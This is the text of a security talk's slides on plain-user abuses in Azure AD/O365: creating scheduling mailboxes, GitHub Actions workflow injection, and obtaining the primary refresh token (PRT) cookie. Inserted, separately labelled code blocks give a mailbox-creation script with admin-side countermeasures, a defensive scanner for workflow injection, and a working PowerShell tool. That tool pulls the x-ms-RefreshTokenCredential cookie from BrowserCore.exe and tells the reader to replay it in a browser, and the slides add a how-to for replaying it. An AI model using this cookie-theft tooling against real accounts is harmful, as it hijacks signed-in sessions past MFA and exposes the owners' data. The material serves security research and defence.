
1/337

Speedrun edition

Features

  • Group, bookings and scheduling mailbox
  • Github workflow injection
  • Asking PRT Cookie 

2/337

This is not a rump talk about cyclimse

Group

(and sometimes user info)

3/337

Warning:
- I have never installed (A)AD or O365 myself, so my vocabulary may be approximate

4/337

By clicking on the account you can sometimes change the first/last name, whereas on myAccount you cannot.

5/337

The group is visible in the contact list

6/337

Bookings

Most official way

7/337

All the stunts in these slides are performed as a plain user.

8/337

So, Sasuke is better than Naruto

9/337

Exchange/Outlook seems to create a member account in the AD

10/337

Pro

- Nice interface

- Fully managed

- No code

- User created in AAD

Con

- Weird name-to-mailbox conversion (dots removed, lowercased, ...)
- Bookings can be disabled (33% success)

11/337

Scheduling mailbox

The forgotten API?

12/337

They call it "backward compatible"

13/337

PB: cga8U9Wd / RTFM

Well, use -Scope CurrentUser to install the module without local admin rights

Pro

- Better control than bookings

- Has to be disabled in addition to Bookings (100% success)

- We can choose domain!

Get-AcceptedDomain

- Create a member in (A)AD

Con

Scheduling mailboxes are still limited (can't log in)

14/337

https://outlook.office.com/mail/sasuke@orga.com to read/write email as that mailbox
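The procedure the slides sketch (install the module as a plain user, pick an accepted domain, create the scheduling mailbox, and on the admin side turn off both creation paths), written out as an added example. This is not Tr4l's code and not from the deck. Assumptions: the plain user is naruto@orga.com, the mailbox is sasuke@orga.com, the OWA policy is the default one named OwaMailboxPolicy-Default (check Get-OwaMailboxPolicy in your tenant), and the New-Mailbox -SchedulingMailbox switch behaves as its documentation describes; the slides' claim that a plain user may run it is what the example exercises, not something verified here.

```powershell
# Added example, not from the deck. Plain-user side first, then the admin side.
# Assumed identities: naruto@orga.com (plain user), sasuke@orga.com (new mailbox).

# 1. Install the Exchange Online module for the current user only: no local admin needed.
Install-Module -Name ExchangeOnlineManagement -Scope CurrentUser -Force
Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline -UserPrincipalName 'naruto@orga.com'   # no admin role assumed

# 2. See what the session actually exposes: the temporary tmpEXO_* module holds
#    the cmdlets RBAC granted to this user.
$exo = Get-Module | Where-Object Name -like 'tmpEXO_*'
Get-Command -ListImported -Module $exo.Name | Select-Object -ExpandProperty Name

# 3. Pick a domain. Any accepted domain of the tenant is fair game here, unlike
#    the Bookings UI which derives the address for you.
Get-AcceptedDomain | Select-Object DomainName, DomainType, Default

# 4. Create the scheduling mailbox. -SchedulingMailbox is the switch Bookings uses;
#    the object shows up as a member user in (A)AD (assumption: the parameter set
#    accepts -PrimarySmtpAddress, as the New-Mailbox docs list it).
New-Mailbox -Name 'sasuke' -PrimarySmtpAddress 'sasuke@orga.com' -SchedulingMailbox

# --- Admin side (Exchange admin session) ---
# 5. Confirm what was created: RecipientTypeDetails should read SchedulingMailbox.
Get-Mailbox -Identity 'sasuke@orga.com' | Select-Object RecipientTypeDetails, PrimarySmtpAddress

# 6. Disabling Bookings alone leaves the cmdlet path open (the "33%" of the slides);
#    the OWA mailbox policy flag is what stops scheduling-mailbox creation.
Set-OrganizationConfig -BookingsEnabled $false
Set-OwaMailboxPolicy -Identity 'OwaMailboxPolicy-Default' -BookingsMailboxCreationEnabled $false
```

Run the admin half only after checking which OWA mailbox policies are actually assigned to users: a second policy without the flag set leaves the path open for the users it covers.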

Github workflow injection

15/337

Synacktiv folks, close your eyes for 3 minutes

Documented

16/337

17/337

It's like eval(`alert('${userInput}')`);

18/337

19/337

Indirect runs can be affected too

Did you know Tribanol?

21/337

Several "aliases" for run
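The eval() analogy in one runnable piece: a small scanner that flags workflow steps where attacker-controlled event data is expanded by `${{ }}` directly into a script body, and stays quiet when the same value is passed through env. This is an added example, not code from the deck or from Tr4l. The workflow text is constructed for the example; the list of untrusted contexts is the commonly documented set (issue/PR title and body, comment bodies, head ref, commit messages and authors) and is not exhaustive; `run:` and `script:` (actions/github-script) are the two script-bearing keys it knows about.

```powershell
# Added example, not from the deck: find `${{ github.event.* }}` expansions inside script bodies.
# Untrusted contexts (not exhaustive; extend for your own event types).
$UntrustedContext = @(
    'github\.event\.issue\.(title|body)',
    'github\.event\.pull_request\.(title|body|head\.ref|head\.label)',
    'github\.event\.(comment|review|review_comment)\.body',
    'github\.event\.pages\.\*\.page_name',
    'github\.event\.commits\.\*\.(message|author\.(name|email))',
    'github\.event\.head_commit\.(message|author\.(name|email))',
    'github\.head_ref'
) -join '|'

# Script-bearing keys: `run:` for shell steps, `script:` for actions/github-script.
$ScriptKey = '^\s*(-\s*)?(run|script)\s*:'

function Find-WorkflowInjection {
    param([Parameter(Mandatory)][string[]]$Lines)
    $findings = @()
    $inScript = $false
    $baseIndent = -1
    for ($i = 0; $i -lt $Lines.Count; $i++) {
        $line = $Lines[$i]
        $indent = $line.Length - $line.TrimStart().Length
        if ($line -match $ScriptKey) {
            # New script value; remember the column of the key so that sibling
            # keys (env:, with:) at the same depth close the scope.
            $inScript = $true
            $baseIndent = $line.IndexOf($Matches[2] + ':')
            $body = $line
        } elseif ($inScript -and ($line.Trim() -eq '' -or $indent -gt $baseIndent)) {
            $body = $line          # continuation line of a block scalar (run: |)
        } else {
            $inScript = $false
            continue
        }
        if ($body -match ('\$\{\{\s*(' + $UntrustedContext + ')\s*\}\}')) {
            $findings += [pscustomobject]@{ Line = $i + 1; Context = $Matches[1]; Text = $body.Trim() }
        }
    }
    return $findings
}

# Constructed sample: one vulnerable step, one fixed step with the same value.
$sample = @'
name: triage
on: issues
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: vulnerable (template expanded into the shell script)
        run: |
          echo "New issue: ${{ github.event.issue.title }}"
      - name: fixed (value reaches the script as an environment variable)
        env:
          TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $TITLE"
'@ -split "`r?`n"

$findings = Find-WorkflowInjection -Lines $sample
$findings | Format-Table -AutoSize
# Only the first step is reported: in the second one the title is data, not code.
```

To sweep a repository, feed it `Get-Content -Path .github\workflows\*.yml` per file. The fix it illustrates is the documented one: bind the expression to an env entry and let the shell read the variable, so the title goes through quoting rules instead of being pasted into the script source.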

PRT Cookie

Asking politely

22/337

GetCookieInfoForUri, for those in the know

23/337

24/337

PB: kue64T0B / RTFM

(That's a zero)

AADInternals was updated yesterday, cool!

How to

Go to portal.azure.com
- redirected to login
- edit/add the cookie as provided
- go to portal.azure.com again
- enjoy

TTL ?

Session SSO: 5 minutes ?
Portal: a few hours ?

Teams: a week ?

outlook: did it even renew?

Other orga linked to SSO ?

25/337

Other ?

The PRT cookie is issued after MFA, and most policies that restrict account login ...
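The "asking politely" step done by hand, as an added example (not the deck's code, not Tr4l's, not AADInternals): BrowserCore.exe is the native-messaging host the "Windows Accounts" browser extension talks to, and it answers a GetCookieInfoForUri request with the x-ms-RefreshTokenCredential value. Assumptions: the default install path under Program Files\Windows Security\BrowserCore, the request JSON shape (method, uri, sender) used by the public ROADtoken tooling, and a response object list whose entries carry name/data fields; the code checks the frame length and the cookie name rather than trusting either. It must run in the signed-in user's session on a Windows host that is AAD-joined or registered.

```powershell
# Added example, not from the deck. Chrome native-messaging framing:
# 4-byte little-endian length, then UTF-8 JSON, in both directions.
function Get-PrtCookie {
    param([string]$Uri = 'https://login.microsoftonline.com/')

    $exe = Join-Path $env:ProgramFiles 'Windows Security\BrowserCore\BrowserCore.exe'   # assumed default path
    if (-not (Test-Path $exe)) { throw "BrowserCore.exe not found at $exe" }

    $psi = New-Object System.Diagnostics.ProcessStartInfo
    $psi.FileName = $exe
    $psi.UseShellExecute = $false
    $psi.RedirectStandardInput = $true
    $psi.RedirectStandardOutput = $true
    $proc = [System.Diagnostics.Process]::Start($psi)

    # Request shape as used by the public tooling (assumption: "sender" is accepted as-is).
    $request = @{ method = 'GetCookieInfoForUri'; uri = $Uri; sender = 'https://login.microsoftonline.com' } |
        ConvertTo-Json -Compress
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($request)
    $in = $proc.StandardInput.BaseStream
    $in.Write([BitConverter]::GetBytes([int32]$bytes.Length), 0, 4)
    $in.Write($bytes, 0, $bytes.Length)
    $in.Flush()

    # Read exactly one response frame; do not assume a single Read() returns it all.
    $out = $proc.StandardOutput.BaseStream
    $lenBuf = New-Object byte[] 4
    if ($out.Read($lenBuf, 0, 4) -ne 4) { throw 'no response frame' }
    $len = [BitConverter]::ToInt32($lenBuf, 0)
    $buf = New-Object byte[] $len
    $read = 0
    while ($read -lt $len) {
        $n = $out.Read($buf, $read, $len - $read)
        if ($n -le 0) { throw 'truncated response frame' }
        $read += $n
    }
    $proc.WaitForExit()

    $reply = [System.Text.Encoding]::UTF8.GetString($buf) | ConvertFrom-Json
    if ($reply.status -and $reply.status -ne 'success') { throw "BrowserCore returned status $($reply.status)" }
    $reply.response | Where-Object { $_.name -eq 'x-ms-RefreshTokenCredential' }
}

# The cookie value is a JWT: decode its payload to see what the IdP will read
# (refresh_token, is_primary, and request_nonce when a nonce was passed in the URI).
function ConvertFrom-PrtCookie {
    param([Parameter(Mandatory)][string]$Data)
    $payload = ($Data -split '\.')[1].Replace('-', '+').Replace('_', '/')
    $payload += '=' * ((4 - $payload.Length % 4) % 4)     # restore base64 padding
    [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
}

$cookie = Get-PrtCookie
"x-ms-RefreshTokenCredential=$($cookie.data)"   # add this on login.microsoftonline.com, then reload portal.azure.com
ConvertFrom-PrtCookie -Data $cookie.data | Format-List
```

The cookie belongs on the login.microsoftonline.com domain, which is why the slides' how-to goes through the portal's redirect first. When the login page you were redirected to carries an sso_nonce parameter, pass that full URL as -Uri so the issued cookie is bound to it; a cookie minted without the nonce is the one to try when no nonce is demanded.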

26/337

27/337

PB: CZ2jzdEx / RTFM

Nice parser, hopefully the client will sanitize

More ?

28/337

Once the PowerShell module is installed:
- Get-Module: list the loaded modules (look at the temporary one)
- Get-Command -ListImported -Module tmpEXO_blah.blah

Powershell Exchange

29/337

30/337

Nothing here

The end

337/337

PS: Claire is really cool.

By Tr4l